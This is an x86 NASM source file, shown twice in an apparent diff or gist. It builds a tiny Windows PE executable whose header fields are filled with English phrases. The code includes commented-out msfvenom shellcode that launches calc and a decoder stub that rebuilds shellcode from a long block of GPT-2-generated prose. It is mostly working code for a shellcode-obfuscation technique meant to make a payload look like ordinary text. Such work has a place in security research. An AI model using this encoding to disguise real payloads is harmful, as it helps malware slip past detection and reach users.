JuliaPoo · November 7, 2021 03:08
diff --git a/eng-shell-x86.asm b/eng-shell-x86.asm
 ; eng-shell-x86.asm
 ; nasm -f bin eng-shell-x86.asm -o b.exe

 BITS 32

 ;
 ; MZ header
 ;
 ; The only two fields that matter are e_magic and e_lfanew

 mzhdr:
    dw "MZ"                ; e_magic
    db " H"                ; e_cblp UNUSED
    db "ii"                ; e_cp UNUSED
    db "!!"                ; e_crlc UNUSED
    db " T"                ; e_cparhdr UNUSED
    db "hi"                ; e_minalloc UNUSED
    db "s "                ; e_maxalloc UNUSED
    db "is"                ; e_ss UNUSED
    db " E"                ; e_sp UNUSED
    db "ng"                ; e_csum UNUSED
    db "li"                ; e_ip UNUSED
    db "sh"                ; e_cs UNUSED
    db " t"                ; e_lsarlc UNUSED
    db "ex"                ; e_ovno UNUSED
    db "t "
    db "th"
    db "at"
    db "'s"                ; e_res UNUSED
    db " a"                ; e_oemid UNUSED
    db " v"                ; e_oeminfo UNUSED
    db "al"
    db "id"
    db " P"
    db "E "
    db "fi"
    db "le"
    db " t"
    db "hi"
    db "ng"
    db ". "                ; e_res2 UNUSED
    dd pesig               ; e_lfanew

 ;
 ; PE signature
 ;

 pesig:
    dd "PE"

 ;
 ; PE header
 ;

 pehdr:
    dw 0x014C                     ; Machine (Intel 386)
    dw 1                          ; NumberOfSections
    db "Engl"                     ; TimeDateStamp UNUSED
    db "ish "                     ; PointerToSymbolTable UNUSED
    db "text"                     ; NumberOfSymbols UNUSED
    dw opthdrsize                 ; SizeOfOptionalHeader
    dw 0x103                      ; Characteristics (no relocations, executable, 32 bit)

 ;
 ; PE optional header
 ;

 secalign  equ 0x20
 filealign equ 0x20
 imgbase   equ 0x410000

 %define round(n, r) (((n+(r-1))/r)*r)

 opthdr:
    dw 0x10B                               ; Magic (PE32)
    db "W"                                 ; MajorLinkerVersion UNUSED
    db "e"                                 ; MinorLinkerVersion UNUSED
    db "ll. "                              ; SizeOfCode UNUSED
    db "Anyw"                              ; SizeOfInitializedData UNUSED
    db "ays,"                              ; SizeOfUninitializedData UNUSED
    dd start                               ; AddressOfEntryPoint
    dd "am  "                              ; BaseOfCode UNUSED
    dd "bad "                              ; BaseOfData UNUSED
    dd imgbase                             ; ImageBase
    dd secalign                            ; secalignment
    dd filealign                           ; FileAlignment
    db "at"                                ; MajorOperatingSystemVersion UNUSED
    db " P"                                ; MinorOperatingSystemVersion UNUSED
    db "E "                                ; MajorImageVersion UNUSED
    db "so"                                ; MinorImageVersion UNUSED
    dw 4                                   ; MajorSubsystemVersion
    db "th"                                ; MinorSubsystemVersion UNUSED
    db "is, "                              ; Win32VersionValue UNUSED
    dd round(filesize, secalign)           ; SizeOfImage
    dd round(hdrsize, filealign)           ; SizeOfHeaders
    db "isnt"                              ; CheckSum UNUSED
    dw 2                                   ; Subsystem (Win32 GUI)
    db "be"                                ; DllCharacteristics UNUSED
    db "st. "                              ; SizeOfStackReserve UNUSED
    db "UwU "                              ; SizeOfStackCommit
    db "OwO "                              ; SizeOfHeapReserve
    db " So "                              ; SizeOfHeapCommit UNUSED
    db "yeah"                              ; LoaderFlags UNUSED
    dd 1                                   ; NumberOfRvaAndSizes (At least one so shellcode can run)

 ;
 ; Data directories
 ;   - It's not used so we can trash it
 ;

    ;times 1 dd 0, 0
    db " it's ok"

 opthdrsize equ $ - opthdr

 ;
 ; PE code section
 ;

    db ".texting"                 ; Name
    dd codesize                   ; VirtualSize
    dd round(hdrsize, secalign)   ; VirtualAddress
    dd round(codesize, filealign) ; SizeOfRawData
    dd code                       ; PointerToRawData
    db "Fill"                     ; PointerToRelocations UNUSED
    db "er t"                     ; PointerToLinenumbers UNUSED
    db "ex"                       ; NumberOfRelocations UNUSED
    db "t "                       ; NumberOfLinenumbers UNUSED
    db "here"                     ; Characteristics (code, execute, read) UNUSED

 hdrsize equ $ - $$

 ;
 ; PE code section data
 ;
    ; align filealign, db 0
    db " Its English code time: "

 code:

 ; Entry point

 start:

    ; Executes WinExec('calc'), generated via msfvenom
    ; db `\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30`
    ; db `\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff`
    ; db `\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52`
    ; db `\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1`
    ; db `\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b`
    ; db `\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03`
    ; db `\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b`
    ; db `\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24`
    ; db `\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb`
    ; db `\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f`
    ; db `\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5`
    ; db `\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a`
    ; db `\x00\x53\xff\xd5\x63\x61\x6c\x63\x00`

    mov	esi, enc+imgbase

    mov esp, esi
    inc esp
    inc esp
    inc esp
    inc esp
    
    xor	bl, bl

 dec:
    lodsd
    add	bl, al
    test ah, 7
    jne dec

    push ebx
    inc esp
    inc esp
    inc esp
    inc esp
    inc esp

    test ax, ax
    jne dec

    mov esp, ebp
    
 enc:
    ; Encoded shellcode, encoded via GPT2
    db " Ashen, wherring in her ears from hentay, juicey tears well hidden pockets in whirling harpoon guns were trown around heas they danced on thursday night as many of thos are around them and their eyes had drawn loincloth throes her ears like water as shillings as her head blew and her voice were filled at tiems, and she had the mistake, foisting them, she thought to ourselves it was in fact a wonderful plaits off in my shoulter and she was it thirteenth or so of throubled dreams are a strange phean cycle of soft noises when it came in and out that night with Lenny foiled the beekeeper in to say with no intention and with just great joy in hedoniousness, she said in anger and sadness when heist wavering between thematically and whimpering through tumbling waters like her daughter, Ruina Mello in a small town on an east coast in thawy winter weather and deep breezes that could beeping birds, beheaded eagles in their heads had to be done for somethin else, so shrugging on that fact and then stung on the way in frisky and a quick check to chime with a note in their pocadero, her sister, said, to thei sat on him like her sister was oncoming child and cared more abutting that she ive coffee for dinner in an alleyway where everyone knew would run into the ersaults at some date in their home with several others but the ernames were still busy whilting and the sun would be seared overcast weathered as blueberries crept into it to be honest he was busy as she would, trying out the next ileo of her own, he urchanted thimble an unblotted across threesomes filled the verness of their hearess was all there at a izkule, and, with hear on threshers on a side an uninterested peatling, one way towards them and she turned the urchas into exciuniform shapaks of redwood, jadeh daft to a vernace, said shingle a iced fruit that smelled the ills at her father did she think he iced things to her but was there a girl who urchaseth ou envelop the trees with a smudgy tumulus appeared, unable to"
    db " see it had made sense that a huja did not even come from wiiley, whiny girl athenas, thinniest girl in highschool in hiattitude to be found out that thieving bees ate every daan and it maisoned at leotards and if it was forgoing, they would juo heiing the queen of thieving and the queen who would be threesome with the girls seemed rawness, and it maiferthed that, she knew how many bees shoo him off this strange corner and around a urn, a woman and an older soothsayer was sitting behind thei the wailing bees haired the shore, so they waited in siute silence whil ailed herself in a ile and anxious trance at on the surface, a icharragon in thirring strings and a doggie named Gwad was there as he caught a ick in one hand as it meredityed through it as muched to look, she felt a dearth of energy in hens or whiffs or whiskeys in case she thought that shiver of what she was seeing and how the urn of been turned around as she was still standing at night when sprees were thundered out of the water her mother was working with was going on, so shivering had hectic, the ersatz had been a liabussist since last season, a tiar had to plough the weeds, then wen their way through taut rowing, a liad to caress a butterfly that waived around her and began movers and around her body to what effect she iced up, and then, then, then agitating for someone to stop racing downriver that shuddred, only one of whicling in the iliest possible ways, in the future chanelled on the butterflies she thought were hectic as a moose or aaclet, he woefully did this too, as if trying no longer had somethinied, but the winded it with somethinying and on, wondering whether she knew somethin she was sure it could happe not just whizz in her sister as a result, but had to do it again as well, instead why we coiled and we coil for the last hairdo in an afternoon for good reeditions she wondered whiter in every waif, a waofed or somethinned, her sisters and I had time so we we looked back upon thumping a sto"
    db "ne, then trying again, she said the ick is just so boring no way or type thinks this will to the end butterfly adventure to take her sister in that made them neuter with no energy, and she thought that if I asked about an hoarse butts about a week when one fell in love, one took the ersatz delight out, she iced a cup ointment or, if we neutrons would see some liuks, and she wondered wh"
 	

 codesize equ $ - code

 filesize equ $ - $$
	; eng-shell-x86.asm
	; nasm -f bin eng-shell-x86.asm -o b.exe

	BITS 32

	;
	; MZ header
	;
	; The only two fields that matter are e_magic and e_lfanew

	mzhdr:
	dw "MZ" ; e_magic
	db " H" ; e_cblp UNUSED
	db "ii" ; e_cp UNUSED
	db "!!" ; e_crlc UNUSED
	db " T" ; e_cparhdr UNUSED
	db "hi" ; e_minalloc UNUSED
	db "s " ; e_maxalloc UNUSED
	db "is" ; e_ss UNUSED
	db " E" ; e_sp UNUSED
	db "ng" ; e_csum UNUSED
	db "li" ; e_ip UNUSED
	db "sh" ; e_cs UNUSED
	db " t" ; e_lsarlc UNUSED
	db "ex" ; e_ovno UNUSED
	db "t "
	db "th"
	db "at"
	db "'s" ; e_res UNUSED
	db " a" ; e_oemid UNUSED
	db " v" ; e_oeminfo UNUSED
	db "al"
	db "id"
	db " P"
	db "E "
	db "fi"
	db "le"
	db " t"
	db "hi"
	db "ng"
	db ". " ; e_res2 UNUSED
	dd pesig ; e_lfanew

	;
	; PE signature
	;

	pesig:
	dd "PE"

	;
	; PE header
	;

	pehdr:
	dw 0x014C ; Machine (Intel 386)
	dw 1 ; NumberOfSections
	db "Engl" ; TimeDateStamp UNUSED
	db "ish " ; PointerToSymbolTable UNUSED
	db "text" ; NumberOfSymbols UNUSED
	dw opthdrsize ; SizeOfOptionalHeader
	dw 0x103 ; Characteristics (no relocations, executable, 32 bit)

	;
	; PE optional header
	;

	secalign equ 0x20
	filealign equ 0x20
	imgbase equ 0x410000

	%define round(n, r) (((n+(r-1))/r)*r)

	opthdr:
	dw 0x10B ; Magic (PE32)
	db "W" ; MajorLinkerVersion UNUSED
	db "e" ; MinorLinkerVersion UNUSED
	db "ll. " ; SizeOfCode UNUSED
	db "Anyw" ; SizeOfInitializedData UNUSED
	db "ays," ; SizeOfUninitializedData UNUSED
	dd start ; AddressOfEntryPoint
	dd "am " ; BaseOfCode UNUSED
	dd "bad " ; BaseOfData UNUSED
	dd imgbase ; ImageBase
	dd secalign ; secalignment
	dd filealign ; FileAlignment
	db "at" ; MajorOperatingSystemVersion UNUSED
	db " P" ; MinorOperatingSystemVersion UNUSED
	db "E " ; MajorImageVersion UNUSED
	db "so" ; MinorImageVersion UNUSED
	dw 4 ; MajorSubsystemVersion
	db "th" ; MinorSubsystemVersion UNUSED
	db "is, " ; Win32VersionValue UNUSED
	dd round(filesize, secalign) ; SizeOfImage
	dd round(hdrsize, filealign) ; SizeOfHeaders
	db "isnt" ; CheckSum UNUSED
	dw 2 ; Subsystem (Win32 GUI)
	db "be" ; DllCharacteristics UNUSED
	db "st. " ; SizeOfStackReserve UNUSED
	db "UwU " ; SizeOfStackCommit
	db "OwO " ; SizeOfHeapReserve
	db " So " ; SizeOfHeapCommit UNUSED
	db "yeah" ; LoaderFlags UNUSED
	dd 1 ; NumberOfRvaAndSizes (At least one so shellcode can run)

	;
	; Data directories
	; - It's not used so we can trash it
	;

	;times 1 dd 0, 0
	db " it's ok"

	opthdrsize equ $ - opthdr

	;
	; PE code section
	;

	db ".texting" ; Name
	dd codesize ; VirtualSize
	dd round(hdrsize, secalign) ; VirtualAddress
	dd round(codesize, filealign) ; SizeOfRawData
	dd code ; PointerToRawData
	db "Fill" ; PointerToRelocations UNUSED
	db "er t" ; PointerToLinenumbers UNUSED
	db "ex" ; NumberOfRelocations UNUSED
	db "t " ; NumberOfLinenumbers UNUSED
	db "here" ; Characteristics (code, execute, read) UNUSED

	hdrsize equ $ - $$

	;
	; PE code section data
	;
	; align filealign, db 0
	db " Its English code time: "

	code:

	; Entry point

	start:

	; Executes WinExec('calc'), generated via msfvenom
	; db `\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30`
	; db `\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff`
	; db `\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52`
	; db `\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1`
	; db `\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b`
	; db `\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03`
	; db `\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b`
	; db `\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24`
	; db `\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb`
	; db `\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f`
	; db `\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5`
	; db `\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a`
	; db `\x00\x53\xff\xd5\x63\x61\x6c\x63\x00`

	mov esi, enc+imgbase

	mov esp, esi
	inc esp
	inc esp
	inc esp
	inc esp

	xor bl, bl

	dec:
	lodsd
	add bl, al
	test ah, 7
	jne dec

	push ebx
	inc esp
	inc esp
	inc esp
	inc esp
	inc esp

	test ax, ax
	jne dec

	mov esp, ebp

	enc:
	; Encoded shellcode, encoded via GPT2
	db " Ashen, wherring in her ears from hentay, juicey tears well hidden pockets in whirling harpoon guns were trown around heas they danced on thursday night as many of thos are around them and their eyes had drawn loincloth throes her ears like water as shillings as her head blew and her voice were filled at tiems, and she had the mistake, foisting them, she thought to ourselves it was in fact a wonderful plaits off in my shoulter and she was it thirteenth or so of throubled dreams are a strange phean cycle of soft noises when it came in and out that night with Lenny foiled the beekeeper in to say with no intention and with just great joy in hedoniousness, she said in anger and sadness when heist wavering between thematically and whimpering through tumbling waters like her daughter, Ruina Mello in a small town on an east coast in thawy winter weather and deep breezes that could beeping birds, beheaded eagles in their heads had to be done for somethin else, so shrugging on that fact and then stung on the way in frisky and a quick check to chime with a note in their pocadero, her sister, said, to thei sat on him like her sister was oncoming child and cared more abutting that she ive coffee for dinner in an alleyway where everyone knew would run into the ersaults at some date in their home with several others but the ernames were still busy whilting and the sun would be seared overcast weathered as blueberries crept into it to be honest he was busy as she would, trying out the next ileo of her own, he urchanted thimble an unblotted across threesomes filled the verness of their hearess was all there at a izkule, and, with hear on threshers on a side an uninterested peatling, one way towards them and she turned the urchas into exciuniform shapaks of redwood, jadeh daft to a vernace, said shingle a iced fruit that smelled the ills at her father did she think he iced things to her but was there a girl who urchaseth ou envelop the trees with a smudgy tumulus appeared, unable to"
	db " see it had made sense that a huja did not even come from wiiley, whiny girl athenas, thinniest girl in highschool in hiattitude to be found out that thieving bees ate every daan and it maisoned at leotards and if it was forgoing, they would juo heiing the queen of thieving and the queen who would be threesome with the girls seemed rawness, and it maiferthed that, she knew how many bees shoo him off this strange corner and around a urn, a woman and an older soothsayer was sitting behind thei the wailing bees haired the shore, so they waited in siute silence whil ailed herself in a ile and anxious trance at on the surface, a icharragon in thirring strings and a doggie named Gwad was there as he caught a ick in one hand as it meredityed through it as muched to look, she felt a dearth of energy in hens or whiffs or whiskeys in case she thought that shiver of what she was seeing and how the urn of been turned around as she was still standing at night when sprees were thundered out of the water her mother was working with was going on, so shivering had hectic, the ersatz had been a liabussist since last season, a tiar had to plough the weeds, then wen their way through taut rowing, a liad to caress a butterfly that waived around her and began movers and around her body to what effect she iced up, and then, then, then agitating for someone to stop racing downriver that shuddred, only one of whicling in the iliest possible ways, in the future chanelled on the butterflies she thought were hectic as a moose or aaclet, he woefully did this too, as if trying no longer had somethinied, but the winded it with somethinying and on, wondering whether she knew somethin she was sure it could happe not just whizz in her sister as a result, but had to do it again as well, instead why we coiled and we coil for the last hairdo in an afternoon for good reeditions she wondered whiter in every waif, a waofed or somethinned, her sisters and I had time so we we looked back upon thumping a sto"
	db "ne, then trying again, she said the ick is just so boring no way or type thinks this will to the end butterfly adventure to take her sister in that made them neuter with no energy, and she thought that if I asked about an hoarse butts about a week when one fell in love, one took the ersatz delight out, she iced a cup ointment or, if we neutrons would see some liuks, and she wondered wh"


	codesize equ $ - code

	filesize equ $ - $$